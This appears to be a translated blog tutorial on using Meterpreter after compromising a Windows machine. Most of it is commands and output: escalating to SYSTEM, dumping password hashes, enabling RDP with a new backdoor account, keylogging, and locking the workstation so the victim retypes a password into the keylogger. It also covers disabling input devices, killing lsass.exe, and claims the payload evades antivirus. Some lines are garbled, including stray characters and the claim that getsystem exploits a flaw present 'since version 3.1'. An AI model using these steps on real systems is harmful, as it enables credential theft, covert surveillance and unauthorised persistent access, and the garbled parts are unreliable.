Secrets of Meterpreter Payload

What is a meterpreter?

Meterpreter - advanced multi-functional filling (Payload), which can be dynamically expanded at run time. Under normal conditions, this means that it provides you with a basic shell and allows you to add new features to it as needed.

The first, most frequent action is the introduction of the explorer into the process. This feature is provided by the migrate command:

meterpreter > migrate 1888 #1888 — PID , - ps
[*] Migrating to 1888...
[*] Migration completed successfully.

Further, as a rule, elevation of privileges to system ones is performed. To do this, there is a getsystem command that uses a vulnerability that has been discovered in all versions of Windows since version 3.1:
')
meterpreter > getsystem
...got system (via technique 1).

Collection of information

The next step, after connecting to the machine, is collecting information, meterpreter simplified this procedure, thanks to the winenum script:

meterpreter > run winenum
[*] Running Windows Local Enumerion Meterpreter Script
[*] New session on 192.168..:1197...
[*] Saving general report to /root/.msf4/logs/scripts/winenum/MICROSOF-30B51A_20111024.0931/MICROSOF-30B51A_20111024.0931.txt
[*] Output of each individual command is saved to /root/.msf4/logs/scripts/winenum/MICROSOF-30B51A_20111024.0931
[*] Checking if MICROSOF-30B51A is a Virtual Machine ........
[*] UAC is Disabled
[*] Running Command List ...
[*] running command net view
[*] running command netstat -ns
[*] running command net accounts
[*] running command netstat -vb
[*] running command route print
[*] running command netstat -nao
[*] running command ipconfig /all
[*] running command arp -a
[*] running command cmd.exe /c set
[*] running command ipconfig /displaydns
[*] running command tasklist /svc
[*] running command netsh firewall show config
[*] running command net group administrators
[*] running command net view /domain
[*] running command net localgroup administrators
[*] running command net localgroup
[*] running command net user
[*] running command net group
[*] running command net session
[*] running command net share
[*] running command gpresult /SCOPE USER /Z
[*] running command gpresult /SCOPE COMPUTER /Z
[*] Running WMIC Commands ....
[*] running command wmic netlogin get name,lastlogon,badpasswordcount
[*] running command wmic nteventlog get path,filename,writeable
[*] running command wmic netclient list brief
[*] running command wmic share get name,path
[*] running command wmic logicaldisk get description,filesystem,name,size
[*] running command wmic volume list brief
[*] running command wmic netuse get name,username,connectiontype,localname
[*] running command wmic service list brief
[*] running command wmic group list
[*] running command wmic useraccount list
[*] running command wmic qfe
[*] running command wmic product get name,version
[*] running command wmic rdtoggle list
[*] running command wmic startup list full
[*] Extracting software list from registry
[*] Dumping password hashes...
[*] Getting Tokens...
[*] All tokens have been processed
[*] Done!

We get a hash of passwords, system settings, a list of users and much more.
There is another script that collects more extensive information, including a registry dump, but sometimes problems arise with it, so I will not bring it. This script is called scraper.

Remote Desktop

Interesting for us is getting access to a remote desktop. Let us dwell on this issue in more detail, since we have all the means for this. The script that performs all connection settings is called getgui. In order to activate the use of the RDP protocol on the remote machine, the -e parameter is used:

meterpreter > run getgui -e
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] Terminal Services service is already set to auto
[*] Opening port in local firewall if necessary
[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20111024.1517.rc

Next we need to add a new user:

meterpreter > run getgui -u NAME -p PASSWORD
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Setting user account for logon
[*] Adding User: NAME with Password: PASSWORD
[*] Adding User: NAME to local group ' '
[*] Adding User: NAME to local group ' '
[*] You can now login with the created user
[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20111024.1642.rc

Where NAME is the username, PASSWORD is the password.

Get shell

If you need to get a shell on a remote machine, the shell command of the same name is executed. Or manually run cmd.

Equipment operations

If you need to disable a keyboard or mouse, use the uictl command. It takes the following parameters:

uictl [enable/disable] [keyboard/mouse]

Enable - enables; disable - disables.

meterpreter > uictl disable mouse #
Disabling mouse...
meterpreter > uictl enable mouse #
Enabling mouse...
meterpreter > uictl disable keyboard #
Disabling keyboard...
meterpreter > uictl enable keyboard #
Enabling keyboard...

Keylogger

Built in keyloger already two. One is just a set of commands: keyscan_start starts the keylogger; keyscan_dump - displays the result; keyscan_stop - stops the keylogger.

There is also a script called keylogrecorder. It is more efficient than keyscan, and moreover, writes the result to the log:

meterpreter > bgrun keylogrecorder
[*] Executed Meterpreter with Job ID 2
meterpreter > [*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/logs/scripts/keylogrecorder/192.168.._20111024.4455.txt #
[*] Recording

meterpreter > bgkill 2 #
[*] Killing background job 2...

Ruby

Meterpreter also provides Ruby scripting. For example, we can display a message box (MessageBox) or lock a workstation. To do this, you must first connect the railgun:

meterpreter > irb
> client.core.use(«railgun»)
=> true

Then, to lock the workstation:

> client.railgun.user32.LockWorkstation() #
=> {«GetLastError» => 0. «return» => true} #

This is often used to get a user password in conjunction with a keylogger:

meterpreter > bgrun keylogrecorder #
[*] Executed Meterpreter with Job ID 2
meterpreter > [*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/logs/scripts/keylogrecorder/192.168.2.27_20111024.4455.txt #
[*] Recording

meterpreter > irb
> client.core.use(«railgun») # railgun
=> true
> client.railgun.user32.LockWorkstation() #
=> {«GetLastError» => 0. «return» => true}

The user, referring to the buggy Windows will enter the password, and we will see it in the keyloger log.

Displaying a dialog with a message is also easy:

> client.railgun.user32.MessageBoxA(0, « », «», «MB_OK»)

More information about the output of such messages can read in MSDN.

There is another interesting command screenshot. With it, you can take a screenshot on the remote machine. If you are working under Linux, the launch of Metasploit should be performed as root, since the screenshot is saved in the msf3 folder.

If you need to shut down or restart the machine, there are shutdown and reboot commands of the same name. If shutdown or reboot did not work, it happens, kill the lsass.exe process, then the system will still restart in a minute:

meterpreter > kill 866 #866 — PID , ps,

Consider another point. I tested Meterpreter on machines with different antivirus and firewalls, in particular Outpost, Dr. Web and KIS. A full check was carried out, the enhanced security modes were activated, but despite this the meterpreter remained unnoticed.

Conclusion

Meterpreter is a great tool for remote control, which in addition to the large number of built-in tools has the ability to expand functionality. At the same time, it is completely invisible for most antiviruses (I did not check everything, I don’t know). There are, of course, separate tools for its detection, for example, Symantec has released it and can download it, but most ordinary users are not aware of what meterpreter is and what it threatens, therefore, IMHO, they will not download a separate product for its detection.